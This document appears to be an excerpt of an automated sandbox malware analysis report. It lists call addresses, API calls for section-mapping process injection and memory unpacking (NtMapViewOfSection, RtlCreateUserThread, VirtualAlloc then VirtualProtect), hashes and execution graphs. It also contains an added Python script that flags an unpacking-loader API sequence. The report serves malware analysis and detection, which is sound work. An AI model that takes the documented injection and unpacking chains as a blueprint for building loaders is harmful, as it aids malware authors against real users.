  • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
  • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
  • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
Memory Dump Source
• Source File: 00000000.00000002.1725946356.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_ctMI3TYXpX.jbxd
Similarity
• API ID: Section$CreateDuplicateObjectSleepView
• String ID:
• API String ID: 1885482327-0
• Opcode ID: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
• Instruction ID: b5ca90d31d4069b8fd1e735589466699ca1bb5e14181e618ca72d4e2f39bbf06
• Opcode Fuzzy Hash: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
• Instruction Fuzzy Hash: D101D2B6608204EBDB019AF49C62A7A37549F44315F200137FA53790F1D67D8643E72F

Control-flow Graph

control_flow_graph: function starting at 401912; internal calls 401193, 40141f, 401514; API calls in graph: Sleep (rendered graph omitted)
APIs
• Sleep.KERNELBASE(00001388), ref: 00401936
  • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
  • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
  • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
Memory Dump Source
• Source File: 00000000.00000002.1725946356.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_ctMI3TYXpX.jbxd
Similarity
• API ID: Section$CreateDuplicateObjectSleepView
• String ID:
• API String ID: 1885482327-0
• Opcode ID: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
• Instruction ID: 0621b20c29367ada74e4c9127c9a5516285bec5e68af8f441e6b7f153e3f788d
• Opcode Fuzzy Hash: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
• Instruction Fuzzy Hash: 11017CB560C204EAEB109AA49C61A7A3318AB44354F304537FA27790F5D67D9612E72F

Control-flow Graph

control_flow_graph: function starting at 5035d8; internal calls 5038eb, 503665; API calls in graph: VirtualAlloc (rendered graph omitted)
APIs
• VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 00503629
Memory Dump Source
• Source File: 00000000.00000002.1726254840.00000000004F1000.00000040.00000020.00020000.00000000.sdmp, Offset: 004F1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4f1000_ctMI3TYXpX.jbxd
Yara matches
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
• Instruction ID: d402faf0347471fe938d492c27253e8d69b2b457deff7dcb84c1c4b11a66b9a1
• Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
• Instruction Fuzzy Hash: 7D112D79A00208EFDB01DF98C985E98BFF5AF08350F0580A4F9489B361D371EA50DB80

Control-flow Graph

control_flow_graph: function starting at 401925; internal calls 401193, 40141f, 401514; API calls in graph: Sleep (rendered graph omitted)
APIs
• Sleep.KERNELBASE(00001388), ref: 00401936
  • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
  • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
  • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
Memory Dump Source
• Source File: 00000000.00000002.1725946356.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_ctMI3TYXpX.jbxd
Similarity
• API ID: Section$CreateDuplicateObjectSleepView
• String ID:
• API String ID: 1885482327-0
• Opcode ID: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
• Instruction ID: ea6e3854d66af35421fcd7571e0742f45a6e64d38424a4e1b6315f5079e28d0a
• Opcode Fuzzy Hash: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
• Instruction Fuzzy Hash: 28F08CB6208204EADB00AEA49C61EBA3318AB44314F304533FB23790F5C67D8612E72F
Strings
Memory Dump Source
• Source File: 00000000.00000002.1726159167.00000000004B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4b0000_ctMI3TYXpX.jbxd
Yara matches
Similarity
• API ID:
• String ID: .$GetProcAddress.$l
• API String ID: 0-2784972518
• Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
• Instruction ID: 98458f537895f65fa26e3601b2473efc5ebda3c16de972de01baa121a5454400
• Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
• Instruction Fuzzy Hash: 703159B6900609DFDB10CF99C880AEEBBF9FF48325F24414AD841A7351D775EA45CBA8
Strings
Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1725946356.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ctMI3TYXpX.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: s
                                                                                                                                        • API String ID: 0-453955339
                                                                                                                                        • Opcode ID: d07de417770535d12de117b97f6c2128d54bdeaeab8d953c590c135d79241f8f
                                                                                                                                        • Instruction ID: 32084d28afe1afe84eccaa2aadec000ca1add1720bdf1548c052102d2181d3f0
                                                                                                                                        • Opcode Fuzzy Hash: d07de417770535d12de117b97f6c2128d54bdeaeab8d953c590c135d79241f8f
                                                                                                                                        • Instruction Fuzzy Hash: 5021226145CAD20FD7034B7808A89D57FF2ED1326170A41EBC080EB0A7DAA9890B8349
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1726254840.00000000004F1000.00000040.00000020.00020000.00000000.sdmp, Offset: 004F1000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_4f1000_ctMI3TYXpX.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                                        • Instruction ID: d855e24e40c3ec07b6305a721ecb9cc5128eb739ce28e3423f863209cecf259f
                                                                                                                                        • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                                        • Instruction Fuzzy Hash: 32117C76340101AFDB54DE59DC81EAA7BEAFB88320B298065ED05CB352E675E902C760
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1725946356.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ctMI3TYXpX.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: d637f55854845c17b2ef1889abfa65daee778aef84c81fe99ca145d77efb4ab1
                                                                                                                                        • Instruction ID: 8df8bbe6331efc2743c071309605838865bd09ee4bc9229f5037613db63a7100
                                                                                                                                        • Opcode Fuzzy Hash: d637f55854845c17b2ef1889abfa65daee778aef84c81fe99ca145d77efb4ab1
                                                                                                                                        • Instruction Fuzzy Hash: 3CF0F0A1E2E243AFCA0A1E34A916532AF1C751632372401FFA083752C2E23D0B17619F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1726159167.00000000004B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004B0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_4b0000_ctMI3TYXpX.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                                                                        • Instruction ID: 339e4f65f165143b3383d71b8c502fa653776667f3f249c0dba16b8d5d280db1
                                                                                                                                        • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                                                                        • Instruction Fuzzy Hash: AF01A276A006048FDF21CF64C905BEB33E9FB86317F4545A6D90A97381E778A9418BA8
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1725946356.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ctMI3TYXpX.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 2e697f2bdb2541e438c090e00759e651186a60c26cca26bbac42aeca89057f02
                                                                                                                                        • Instruction ID: 9241026e722b7dd7cbe781a55eac82938fa1721c21c2f19ebd5655df2a8ce19b
                                                                                                                                        • Opcode Fuzzy Hash: 2e697f2bdb2541e438c090e00759e651186a60c26cca26bbac42aeca89057f02
                                                                                                                                        • Instruction Fuzzy Hash: 90F024A191E281DBCA0E1E2858169327F1C7A5230733405FF9093762C2E13D8B02619F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1725946356.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ctMI3TYXpX.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: ffb84ad0bafd287640d5e2703f1f7dee9546aae40f50b635da61e00f6775f880
                                                                                                                                        • Instruction ID: 0b233a05c36d383cd3dc693d5d52553799fa9f094e89171df70cdd77f1a33a14
                                                                                                                                        • Opcode Fuzzy Hash: ffb84ad0bafd287640d5e2703f1f7dee9546aae40f50b635da61e00f6775f880
                                                                                                                                        • Instruction Fuzzy Hash: 5CF027A1E6E202ABCA0E1E20AD165727F4D651132372401FFA053B63C1E17D4B07619F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1725946356.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ctMI3TYXpX.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 675dd5adc9fa045870a710e44379b64774d26f731239f7a86ac84ccf831d603a
                                                                                                                                        • Instruction ID: 61f4eeca6a5bdba97633f9ce55ed0ebe4cfc5c7823726c26b0d716f95b27c2a1
                                                                                                                                        • Opcode Fuzzy Hash: 675dd5adc9fa045870a710e44379b64774d26f731239f7a86ac84ccf831d603a
                                                                                                                                        • Instruction Fuzzy Hash: 1EF027A191E242DBCA0D2E246D158322F4C295530733401FF9053B92C2E03E8B07619F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1725946356.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ctMI3TYXpX.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 7491e8d205a9a81a512842342f84d5d05ba67224b994174453f1348fb0568999
                                                                                                                                        • Instruction ID: 50319dc6f67c7bb301174255112627998741b5b21f267b3f7f348d4aa007f6d0
                                                                                                                                        • Opcode Fuzzy Hash: 7491e8d205a9a81a512842342f84d5d05ba67224b994174453f1348fb0568999
                                                                                                                                        • Instruction Fuzzy Hash: A5E068A2D2E2029BCA1E1E206D464333F4C625630B72001FF9053B92C1F03E4B0661DF
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1725946356.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ctMI3TYXpX.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 4880d3875d1ad92a9fbe5811d46a77b3d6ce579c17d5e0502d0cbfecac410ff8
                                                                                                                                        • Instruction ID: 65af031b81eeafed772fbc50416c1b4fdc84f259fd59d49ecec168145e9dac47
                                                                                                                                        • Opcode Fuzzy Hash: 4880d3875d1ad92a9fbe5811d46a77b3d6ce579c17d5e0502d0cbfecac410ff8
                                                                                                                                        • Instruction Fuzzy Hash: 3EE0ED92E6E2854BCAA52E30980A1623F5C69A331A32480FFA002A52D2F03E0F05815B

                                                                                                                                        Execution Graph

                                                                                                                                        Execution Coverage:9.9%
                                                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                                                        Signature Coverage:0%
                                                                                                                                        Total number of Nodes:52
                                                                                                                                        Total number of Limit Nodes:2
Execution graph (flattened node/edge data from the report, rebuilt as call paths; addresses in hex, API calls in brackets):

Subgraph rooted at 592d99: 592d99 -> 592da8 -> 593539 [3 API calls] -> 592db1
Subgraph rooted at 592d88: 592d88 -> 592d91 -> 593539 -> 593554 -> 59355d [CreateToolhelp32Snapshot] -> 593579 [Module32First] -> 593588 -> 5931f8 -> 593223 -> 593234 [VirtualAlloc] -> 59326c
    additional edges: 593554 -> 593579; 59355d -> 593554 (loop); 593579 -> 592db1; 593223 -> 59326c; 59326c -> 59326c (self-loop)
Subgraph rooted at 530001: 530001 -> 530005 -> 53092b [GetPEB] -> 530972 -> 530030 -> 53003c -> 530049 -> 530e0f [2 API calls] -> 530223 -> 530d90 [GetPEB] -> 530238 [VirtualAlloc] -> 530265 -> 5302ce [VirtualProtect] -> 53030b -> 530439 [VirtualFree] -> 5304be [LoadLibraryA] -> 5308c7
Subgraph rooted at 530005: 530005 -> 53092b [GetPEB] -> 530030 -> 53003c [7 API calls] -> 530038
Subgraph rooted at 53003c: 53003c -> 530049 -> 530e0f [SetErrorMode, SetErrorMode] -> 530223 -> 530d90 -> 530dad -> 530dbb [GetPEB] -> 530238 [VirtualAlloc] -> 530265 -> 5302ce [VirtualProtect] -> 53030b -> 530439 [VirtualFree] -> 5304be [LoadLibraryA] -> 5308c7
    additional edge: 530dad -> 530238
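Joe Sandbox stores the execution graph as a flat token stream ("<id> <addr> [label]" for nodes, "<id>-><id>" for edges), which is hard to read but easy to parse. The Python below is an added editorial example, not code from Joe Sandbox or from the sample: it parses that stream, walks every root-to-sink path, lists the API calls seen along each, and flags roots whose path contains the ordered VirtualAlloc -> VirtualProtect -> LoadLibraryA sequence that the function at 53003c exhibits (commit memory, change page protection, resolve imports). The input is the report's own two subgraphs rooted at 592d88 and 530001, copied from the graph text; the loader pattern tuple, the function names and the "N API calls" collapsing rule are assumptions of this example.

```python
import re
from collections import defaultdict

# Constructed input: the flattened execution-graph text copied from the report
# (two of its subgraphs, rooted at 592d88 and 530001). Node tokens are
# "<id> <hex addr> [label...]", edge tokens are "<id>-><id>".
GRAPH_TEXT = (
    "execution_graph "
    "1001 592d88 1002 592d91 1001->1002 1005 593539 1002->1005 1011 593554 "
    "1005->1011 1006 59355d CreateToolhelp32Snapshot 1007 593579 Module32First "
    "1006->1007 1006->1011 1008 593588 1007->1008 1009 592db1 1007->1009 "
    "1012 5931f8 1008->1012 1011->1006 1011->1007 1013 593223 1012->1013 "
    "1014 59326c 1013->1014 1015 593234 VirtualAlloc 1013->1015 1014->1014 "
    "1015->1014 "
    "1035 530001 1036 530005 1035->1036 1041 53092b GetPEB 1036->1041 "
    "1038 530030 1043 53003c 1038->1043 1042 530972 1041->1042 1042->1038 "
    "1044 530049 1043->1044 1045 530e0f 2 API calls 1044->1045 1046 530223 "
    "1045->1046 1047 530d90 GetPEB 1046->1047 1048 530238 VirtualAlloc "
    "1047->1048 1049 530265 1048->1049 1050 5302ce VirtualProtect 1049->1050 "
    "1052 53030b 1050->1052 1051 530439 VirtualFree 1055 5304be LoadLibraryA "
    "1051->1055 1052->1051 1054 5308c7 1055->1054"
)

NODE_ID_RE = re.compile(r"^\d+$")
ADDR_RE = re.compile(r"^[0-9a-f]{4,8}$")
EDGE_RE = re.compile(r"^(\d+)->(\d+)$")
SUMMARY_RE = re.compile(r"^\d+ API calls$")   # collapsed callee label, e.g. "2 API calls"

# Ordered API subsequence treated here as an in-memory loader signature:
# commit memory, flip page protection, then resolve imports.
# Assumed heuristic for this example, not a Joe Sandbox rule.
LOADER_PATTERN = ("VirtualAlloc", "VirtualProtect", "LoadLibraryA")


def parse_execution_graph(text):
    """Return ({node_id: (addr, label)}, [(src_id, dst_id), ...])."""
    tokens = text.split()
    if tokens and tokens[0] == "execution_graph":
        tokens = tokens[1:]
    nodes, edges, current, i = {}, [], None, 0
    while i < len(tokens):
        tok = tokens[i]
        edge = EDGE_RE.match(tok)
        if edge:
            edges.append((edge.group(1), edge.group(2)))
            current = None               # an edge ends any pending node label
            i += 1
        elif NODE_ID_RE.match(tok) and i + 1 < len(tokens) and ADDR_RE.match(tokens[i + 1]):
            current = tok                # "<id> <addr>" opens a new node
            nodes[tok] = [tokens[i + 1], []]
            i += 2
        else:
            if current is not None:      # any other token is a label word
                nodes[current][1].append(tok)
            i += 1
    return {k: (addr, " ".join(words)) for k, (addr, words) in nodes.items()}, edges


def api_paths(nodes, edges):
    """Walk every root to every sink; return [(root_addr, [api, ...]), ...]."""
    succ = defaultdict(list)
    targets = set()
    for s, d in edges:
        succ[s].append(d)
        targets.add(d)
    paths = []

    def walk(n, seen, apis, root_addr):
        _addr, label = nodes[n]
        if label and not SUMMARY_RE.match(label):
            apis = apis + label.split()  # "SetErrorMode SetErrorMode" -> two calls
        nxt = [d for d in succ[n] if d not in seen]   # skips self-loops and cycles
        if not nxt:
            paths.append((root_addr, apis))
        for d in nxt:
            walk(d, seen | {d}, apis, root_addr)

    for root in (n for n in nodes if n not in targets):
        walk(root, {root}, [], nodes[root][0])
    return paths


def contains_in_order(seq, pattern):
    """True if every element of pattern occurs in seq in that order (gaps allowed)."""
    it = iter(seq)
    return all(any(x == p for x in it) for p in pattern)


def flag_loader_roots(text, pattern=LOADER_PATTERN):
    """Addresses of graph roots that have at least one path matching the pattern."""
    nodes, edges = parse_execution_graph(text)
    return sorted({root for root, apis in api_paths(nodes, edges)
                   if contains_in_order(apis, pattern)})


if __name__ == "__main__":
    g_nodes, g_edges = parse_execution_graph(GRAPH_TEXT)
    for root, apis in api_paths(g_nodes, g_edges):
        print(root, "->", " ".join(apis) or "(no API calls)")
    print("loader-pattern roots:", flag_loader_roots(GRAPH_TEXT))
```

Run against the report's graph this prints one path per root-to-sink walk and reports 530001 as the only root whose path matches the loader ordering; the 592d88 subgraph (Toolhelp module enumeration followed by VirtualAlloc) does not, which is what you want from a heuristic meant to single out the unpacking stub rather than every function that allocates memory.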

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
Control-flow graph of 53003c (55 basic blocks, 53003c-530047 through 530902-53091d; flattened graph data, summarised). Blocks that call out:
53004c-530263: call 530a3f, call 530e0f, call 530d90, VirtualAlloc
530265-530289: call 530a69
5302ce-5303c2: VirtualProtect, call 530cce, call 530ce7
5303e2-530437: call 530ce7 (loops with 5303d1-5303e0)
530439-5304b8: VirtualFree
53086e-5308be: LoadLibraryA (reached from 5307a6-5307b0, 530839-53083c and 530849)
Main path: 53003c-530047 -> 53004c-530263 [VirtualAlloc] -> 530265-530289 -> 5302ce-5303c2 [VirtualProtect] -> 5303d1-5303e0 -> 530439-5304b8 [VirtualFree] -> 5305f4-5305fe -> 53077f-530789 -> 5307a6-5307b0 -> 53086e-5308be [LoadLibraryA] -> 5308c7-5308f9 -> 530902-53091d
                                                                                                                                        APIs
• VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0053024D (lpAddress = NULL, dwSize not recorded, flAllocationType = 0x1000 MEM_COMMIT, flProtect = 0x04 PAGE_READWRITE; the block is later made executable via the VirtualProtect call at 5302ce)
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.1976888383.0000000000530000.00000040.00001000.00020000.00000000.sdmp, Offset: 00530000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_530000_jghruer.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocVirtual
                                                                                                                                        • String ID: cess$kernel32.dll
                                                                                                                                        • API String ID: 4275171209-1230238691
                                                                                                                                        • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                        • Instruction ID: dbbae28743631155f3db6bb32cb2d02d0cd49f0ed6f47c960f984cfc88bdb838
                                                                                                                                        • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                        • Instruction Fuzzy Hash: 7C526874A01229DFDB64CF58C995BA8BBB1BF09304F1480D9E90DAB391DB30AE95DF14

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
Control-flow graph of 593539 (10 basic blocks; block [API or call] -> successors):
593539-593552 -> 593554-593556
593554-593556 -> 593558, 59355d-593569
593558 -> 59355d-593569
59355d-593569 [CreateToolhelp32Snapshot] -> 593579-593586, 59356b-593571
59356b-593571 -> 593579-593586, 593573-593577
593573-593577 -> 593554-593556, 593579-593586
593579-593586 [Module32First] -> 593588-593589, 59358f-593597
593588-593589 [call 5931f8] -> 59358e
59358e -> 59358f-593597
59358f-593597 (exit)
                                                                                                                                        APIs
• CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00593561 (dwFlags = 0x8 TH32CS_SNAPMODULE, th32ProcessID = 0, i.e. the calling process's own module list)
• Module32First.KERNEL32(00000000,00000224), ref: 00593581 (dwSize = 0x224 = 548 bytes = sizeof(MODULEENTRY32) on 32-bit; the snapshot handle argument is logged as 0)
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.1977011876.0000000000581000.00000040.00000020.00020000.00000000.sdmp, Offset: 00581000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_581000_jghruer.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3833638111-0
                                                                                                                                        • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                        • Instruction ID: fb25cf28a47df7d8de963588b828c7e0e867f236cb339ae55f71129d46a350a8
                                                                                                                                        • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                        • Instruction Fuzzy Hash: 54F0C232500314ABDB202AB8A88DA6A7BE8BF4D320F140528F646910C0CA70EE454660

Control-flow Graph

• Rendered graph not reproduced. Basic blocks: 530e0f-530e24 [SetErrorMode x2], 530e26, 530e2b-530e2c.
                                                                                                                                        APIs
                                                                                                                                        • SetErrorMode.KERNELBASE(00000400,?,?,00530223,?,?), ref: 00530E19
                                                                                                                                        • SetErrorMode.KERNELBASE(00000000,?,?,00530223,?,?), ref: 00530E1E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.1976888383.0000000000530000.00000040.00001000.00020000.00000000.sdmp, Offset: 00530000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_530000_jghruer.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorMode
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2340568224-0
                                                                                                                                        • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                        • Instruction ID: 744b544679e81edac46ace1a1040a10e47f9b2819e4d35e23ba8ce53e105023a
                                                                                                                                        • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                        • Instruction Fuzzy Hash: BDD0123124522877D7003A94DC09BCD7F1CDF05B62F008411FB0DD9080C770994046E5

Control-flow Graph

• Rendered graph not reproduced. Basic blocks: 5931f8-593232 [call 59350b], 593234-593267 [VirtualAlloc, call 593285], 59326c-59327e, 593280 (self-loop).
                                                                                                                                        APIs
                                                                                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 00593249
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.1977011876.0000000000581000.00000040.00000020.00020000.00000000.sdmp, Offset: 00581000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_581000_jghruer.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocVirtual
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4275171209-0
                                                                                                                                        • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                        • Instruction ID: d6e07bd13e477c12f16283f6322ee00abbbfd7e5362513ee2dd086a2c22d3b96
                                                                                                                                        • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                        • Instruction Fuzzy Hash: 6E113C79A00208EFDB01DF98C985E98BFF5AF08351F158094F9489B362D375EA50DF80

                                                                                                                                        Execution Graph

                                                                                                                                        Execution Coverage:10.9%
                                                                                                                                        Dynamic/Decrypted Code Coverage:32.7%
                                                                                                                                        Signature Coverage:0%
                                                                                                                                        Total number of Nodes:147
                                                                                                                                        Total number of Limit Nodes:6
execution_graph (rendered image not reproduced; call chains recovered from the node list):
• 4019c0 / 4019e0 / 4019eb -> 401a29 Sleep -> 4014fb (7 API calls) -> 401a44 -> 4015fb (7 API calls) -> 401a55
• 402ed9 / 402f42 / 402fbe -> 4019e0 (15 API calls) -> 40304f
• 403103 / 403257 -> 4031f0 RtlCreateUserThread, NtTerminateProcess -> 403246
• 4014fa / 4014fb / 4015fb / 401606 / 401613 -> 4016af NtDuplicateObject -> 4016cc NtCreateSection -> 4016f2 NtMapViewOfSection -> 401715 NtMapViewOfSection -> 401733 -> 40174c NtCreateSection -> 401778 -> 401782 NtMapViewOfSection -> 4017a9 NtMapViewOfSection -> 4017cb; a failing call leaves the chain early to 4017cb (or to 4015ea in the 4014fb variant)
• 5b0001 / 5b0005 / 5b003c -> 5b092b GetPEB -> 5b0e0f SetErrorMode, SetErrorMode -> 5b0223 -> 5b0d90 / 5b0dbb GetPEB -> 5b0238 VirtualAlloc -> 5b02ce VirtualProtect -> 5b0439 VirtualFree -> 5b04be LoadLibraryA -> 5b08c7
• 7831c5 -> 7831d4 -> 783965 -> 783989 CreateToolhelp32Snapshot -> 7839a5 Module32First -> 783624 -> 783660 VirtualAlloc -> 783698 (alternate edge from Module32First back to 7831dd)

Control-flow Graph

• Rendered graph not reproduced. Function 4014fb-4019dd: calls sub_40127e at 401531, 401634 and 401996; NtDuplicateObject at 4016af-4016c6; NtCreateSection at 4016cc-4016f0 and 40174c-401772; NtMapViewOfSection at 4016f2-401713, 401715-401731, 401782-4017a3 and 4017a9-4017c5; tail call to 4017d0 at 4017cb. Every API block also has an edge to the exit block 401987.
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2326877906.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_35DB.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
